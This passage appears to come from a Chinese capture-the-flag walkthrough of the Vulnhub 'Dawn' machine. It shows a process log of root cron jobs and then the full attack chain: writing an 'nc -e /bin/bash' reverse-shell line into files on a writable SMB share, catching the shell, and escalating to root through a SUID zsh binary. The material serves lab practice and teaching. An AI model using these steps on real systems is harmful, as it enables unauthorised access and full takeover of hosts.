2022/12/03 21:26:01 CMD: UID=0 PID=831 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:26:01 CMD: UID=0 PID=830 | /usr/sbin/CRON -f
2022/12/03 21:26:01 CMD: UID=0 PID=835 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:26:01 CMD: UID=??? PID=834 | ???
2022/12/03 21:26:01 CMD: UID=33 PID=833 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:26:01 CMD: UID=33 PID=836 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:26:58 CMD: UID=0 PID=838 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:26:58 CMD: UID=0 PID=837 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:01 CMD: UID=0 PID=844 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=843 | /usr/sbin/cron -f
2022/12/03 21:27:01 CMD: UID=0 PID=842 | /usr/sbin/cron -f
2022/12/03 21:27:01 CMD: UID=0 PID=841 | /usr/sbin/cron -f
2022/12/03 21:27:01 CMD: UID=0 PID=840 | /usr/sbin/cron -f
2022/12/03 21:27:01 CMD: UID=0 PID=847 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=846 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=845 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=850 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:27:01 CMD: UID=0 PID=849 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:27:01 CMD: UID=0 PID=848 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=852 | /usr/sbin/CRON -f
2022/12/03 21:27:01 CMD: UID=0 PID=851 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:27:01 CMD: UID=1000 PID=853 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:27:01 CMD: UID=33 PID=854 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:27:09 CMD: UID=0 PID=855 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=857 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=858 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=859 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=860 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=861 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=862 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=863 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:27:09 CMD: UID=0 PID=864 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:28:01 CMD: UID=0 PID=870 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0 PID=869 | /usr/sbin/cron -f
2022/12/03 21:28:01 CMD: UID=0 PID=868 | /usr/sbin/cron -f
2022/12/03 21:28:01 CMD: UID=0 PID=867 | /usr/sbin/cron -f
2022/12/03 21:28:01 CMD: UID=0 PID=866 | /usr/sbin/cron -f
2022/12/03 21:28:01 CMD: UID=0 PID=874 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0 PID=873 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0 PID=872 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0 PID=871 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=0 PID=877 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:28:01 CMD: UID=0 PID=876 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:28:01 CMD: UID=0 PID=875 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:28:01 CMD: UID=0 PID=879 | /usr/sbin/CRON -f
2022/12/03 21:28:01 CMD: UID=1000 PID=878 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:28:01 CMD: UID=33 PID=880 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:29:01 CMD: UID=0 PID=885 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=0 PID=884 | /usr/sbin/cron -f
2022/12/03 21:29:01 CMD: UID=0 PID=883 | /usr/sbin/cron -f
2022/12/03 21:29:01 CMD: UID=0 PID=882 | /usr/sbin/cron -f
2022/12/03 21:29:01 CMD: UID=0 PID=881 | /usr/sbin/cron -f
2022/12/03 21:29:01 CMD: UID=0 PID=888 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=0 PID=887 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=0 PID=886 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=0 PID=891 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:29:01 CMD: UID=0 PID=890 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:29:01 CMD: UID=0 PID=889 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=0 PID=892 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:29:01 CMD: UID=1000 PID=894 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:29:01 CMD: UID=0 PID=893 | /usr/sbin/CRON -f
2022/12/03 21:29:01 CMD: UID=33 PID=895 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:29:09 CMD: UID=0 PID=896 | /sbin/dhclient -4 -v -i -pf /run/dhclient.enp0s3.pid -lf /var/lib/dhcp/dhclient.enp0s3.leases -I -df /var/lib/dhcp/dhclient6.enp0s3.leases enp0s3
2022/12/03 21:29:09 CMD: UID=0 PID=897 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:09 CMD: UID=0 PID=898 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:09 CMD: UID=0 PID=899 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:09 CMD: UID=0 PID=900 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:10 CMD: UID=0 PID=901 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:10 CMD: UID=0 PID=902 | /sbin/init
2022/12/03 21:29:10 CMD: UID=0 PID=903 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:29:10 CMD: UID=0 PID=904 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:10 CMD: UID=0 PID=905 | /bin/sh /sbin/dhclient-script
2022/12/03 21:29:52 CMD: UID=0 PID=906 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:29:53 CMD: UID=0 PID=907 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:30:01 CMD: UID=0 PID=913 | /usr/sbin/CRON -f
2022/12/03 21:30:01 CMD: UID=0 PID=912 | /usr/sbin/cron -f
2022/12/03 21:30:01 CMD: UID=0 PID=911 | /usr/sbin/cron -f
2022/12/03 21:30:01 CMD: UID=0 PID=910 | /usr/sbin/cron -f
2022/12/03 21:30:01 CMD: UID=0 PID=909 | /usr/sbin/cron -f
2022/12/03 21:30:01 CMD: UID=0 PID=908 | /usr/sbin/cron -f
2022/12/03 21:30:01 CMD: UID=0 PID=922 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:30:01 CMD: UID=1000 PID=921 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:30:01 CMD: UID=0 PID=920 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:30:01 CMD: UID=33 PID=919 | /usr/sbin/CRON -f awn/ITDEPT/web-control
2022/12/03 21:30:01 CMD: UID=0 PID=917 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:30:01 CMD: UID=??? PID=916 | ???
2022/12/03 21:30:01 CMD: UID=??? PID=915 | ???
2022/12/03 21:30:01 CMD: UID=0 PID=924 | /usr/sbin/CRON -f
2022/12/03 21:30:01 CMD: UID=33 PID=923 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:30:14 CMD: UID=0 PID=925 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:30:26 CMD: UID=0 PID=926 | /usr/sbin/anacron -d -q -s
2022/12/03 21:30:26 CMD: UID=0 PID=927 | /sbin/init
2022/12/03 21:30:26 CMD: UID=0 PID=928 | /bin/sh -c run-parts --report /etc/cron.monthly
2022/12/03 21:30:26 CMD: UID=0 PID=929 | run-parts --report /etc/cron.monthly
2022/12/03 21:30:26 CMD: UID=0 PID=930 | /bin/sh /etc/cron.monthly/0anacron
2022/12/03 21:30:26 CMD: UID=0 PID=931 | anacron -u cron.monthly
2022/12/03 21:30:27 CMD: UID=0 PID=932 | /usr/sbin/nmbd --foreground --no-process-group
2022/12/03 21:30:28 CMD: UID=0 PID=933 | /usr/sbin/smbd --foreground --no-process-group
2022/12/03 21:31:01 CMD: UID=0 PID=938 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=937 | /usr/sbin/cron -f
2022/12/03 21:31:01 CMD: UID=0 PID=936 | /usr/sbin/cron -f
2022/12/03 21:31:01 CMD: UID=0 PID=935 | /usr/sbin/cron -f
2022/12/03 21:31:01 CMD: UID=0 PID=934 | /usr/sbin/cron -f
2022/12/03 21:31:01 CMD: UID=0 PID=940 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=939 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=942 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=941 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=944 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:31:01 CMD: UID=0 PID=943 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:31:01 CMD: UID=1000 PID=947 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:31:01 CMD: UID=0 PID=946 | /usr/sbin/CRON -f
2022/12/03 21:31:01 CMD: UID=0 PID=945 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:31:01 CMD: UID=33 PID=948 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:31:03 CMD: UID=0 PID=949 |
2022/12/03 21:31:32 CMD: UID=0 PID=950 | /usr/sbin/apache2 -k start
2022/12/03 21:32:01 CMD: UID=0 PID=955 | /usr/sbin/cron -f
2022/12/03 21:32:01 CMD: UID=0 PID=954 | /usr/sbin/cron -f
2022/12/03 21:32:01 CMD: UID=0 PID=953 | /usr/sbin/cron -f
2022/12/03 21:32:01 CMD: UID=0 PID=952 | /usr/sbin/cron -f
2022/12/03 21:32:01 CMD: UID=0 PID=951 | /usr/sbin/cron -f
2022/12/03 21:32:01 CMD: UID=0 PID=958 | /usr/sbin/CRON -f
2022/12/03 21:32:01 CMD: UID=0 PID=957 | /usr/sbin/CRON -f
2022/12/03 21:32:01 CMD: UID=0 PID=956 | /usr/sbin/CRON -f
2022/12/03 21:32:01 CMD: UID=0 PID=960 | /usr/sbin/CRON -f
2022/12/03 21:32:01 CMD: UID=0 PID=959 | /usr/sbin/CRON -f
2022/12/03 21:32:01 CMD: UID=0 PID=963 | /bin/sh -c /home/ganimedes/phobos
2022/12/03 21:32:01 CMD: UID=0 PID=962 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
2022/12/03 21:32:01 CMD: UID=0 PID=961 | /bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
2022/12/03 21:32:01 CMD: UID=33 PID=965 | /bin/sh -c /home/dawn/ITDEPT/web-control
2022/12/03 21:32:01 CMD: UID=1000 PID=964 | /bin/sh -c /home/dawn/ITDEPT/product-control
2022/12/03 21:32:29 CMD: UID=33 PID=966 | /usr/sbin/apache2 -k start
2022/12/03 21:32:30 CMD: UID=0 PID=968 | /usr/sbin/apache2 -k start
2022/12/03 21:32:30 CMD: UID=0 PID=967 | /usr/sbin/apache2 -k start
2022/12/03 21:32:31 CMD: UID=0 PID=972 | /usr/sbin/apache2 -k start
2022/12/03 21:32:31 CMD: UID=0 PID=971 | /usr/sbin/apache2 -k start
2022/12/03 21:32:31 CMD: UID=0 PID=970 | /usr/sbin/apache2 -k start
2022/12/03 21:32:31 CMD: UID=0 PID=969 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=980 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=979 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=978 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=977 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=976 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=975 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=974 | /usr/sbin/apache2 -k start
2022/12/03 21:32:32 CMD: UID=0 PID=973 | /usr/sbin/apache2 -k start
其中:
/bin/sh -c chmod 777 /home/dawn/ITDEPT/product-control
/bin/sh -c chmod 777 /home/dawn/ITDEPT/web-control
事实上在/ITDEPT目录下并没有这两个文件,可以将shell写入这两个文件中,然后通过smbclient上传
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555&' > product-control
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555&' > web-control
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ smbclient //192.168.56.251/ITDEPT
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> put product-control
putting file product-control as \product-control (0.4 kb/s) (average 0.4 kb/s)
smb: \> put web-control
putting file web-control as \web-control (12.0 kb/s) (average 0.9 kb/s)
smb: \> ls
. D 0 Sat Dec 3 22:05:51 2022
.. D 0 Fri Aug 2 23:21:39 2019
test.txt A 0 Sat Dec 3 21:30:48 2022
web-control A 37 Sat Dec 3 22:05:51 2022
product-control A 37 Sat Dec 3 22:05:48 2022
7158264 blocks of size 1024. 2641220 blocks available
smb: \>
┌──(kali㉿kali)-[~/Vulnhub/Dawn]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.251] 57982
id
uid=1000(dawn) gid=1000(dawn) groups=1000(dawn),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
dawn@dawn:~$ pwd
pwd
/home/dawn
dawn@dawn:~$ ls -alh
ls -alh
total 44K
drwxr-xr-x 5 dawn dawn 4.0K Aug 2 2019 .
drwxr-xr-x 4 root root 4.0K Aug 2 2019 ..
-rw------- 1 dawn dawn 1.3K Aug 2 2019 .bash_history
-rw-r--r-- 1 dawn dawn 220 Jul 31 2019 .bash_logout
-rw-r--r-- 1 dawn dawn 3.5K Jul 31 2019 .bashrc
drwx------ 3 dawn dawn 4.0K Aug 1 2019 .gnupg
drwsrwsrwx 2 dawn dawn 4.0K Dec 3 22:05 ITDEPT
drwxr-xr-x 3 dawn dawn 4.0K Aug 1 2019 .local
-rw------- 1 dawn dawn 13 Aug 1 2019 .mysql_history
-rw-r--r-- 1 dawn dawn 807 Jul 31 2019 .profile
-rw-r--r-- 1 dawn dawn 66 Aug 1 2019 .selected_editor
dawn@dawn:~$
在Kali Linux上成功得到了目标主机反弹回来的shell
提权
将Linpeas.sh脚本上传至目标主机的/tmp目录下,修改权限,并执行脚本,其中输出结果中下面所列内容引起注意:
╔═══════════════════╗
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
-rwsr-xr-x 1 root root 35K Jun 17 2018 /usr/sbin/mount.cifs
-rwsr-xr-- 1 root messagebus 50K Jun 9 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 19K Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 427K Apr 8 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 23K Jan 15 2019 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 154K Jan 12 2019 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 842K Feb 4 2019 /usr/bin/zsh
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
其中zsh命令可以被利用来提权。
dawn@dawn:/tmp$ /usr/bin/zsh
/usr/bin/zsh
dawn# cd /root
cd /root
dawn# ls -alh
ls -alh
total 4.4M
drwx------ 6 root root 4.0K Aug 2 2019 .
drwxr-xr-x 18 root root 4.0K Jul 31 2019 ..
-rw------- 1 root root 307 Aug 2 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 3 root root 4.0K Jul 31 2019 .config
-rw-r--r-- 1 root root 260 Aug 2 2019 flag.txt
drwx------ 3 root root 4.0K Aug 1 2019 .gnupg
drwxr-xr-x 3 root root 4.0K Jul 31 2019 .local
-rw------- 1 root root 944 Aug 2 2019 .mysql_history
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rwxr-xr-x 1 root root 4.3M Aug 1 2019 pspy64
-rw-r--r-- 1 root root 66 Aug 1 2019 .selected_editor
drwxr-xr-x 4 root root 4.0K Jul 31 2019 .wine
dawn#
dawn# cat flag.txt
cat flag.txt
提权成功,并拿到了Root flag。
STRIVE FOR PROGRESS,NOT FOR PERFECTION
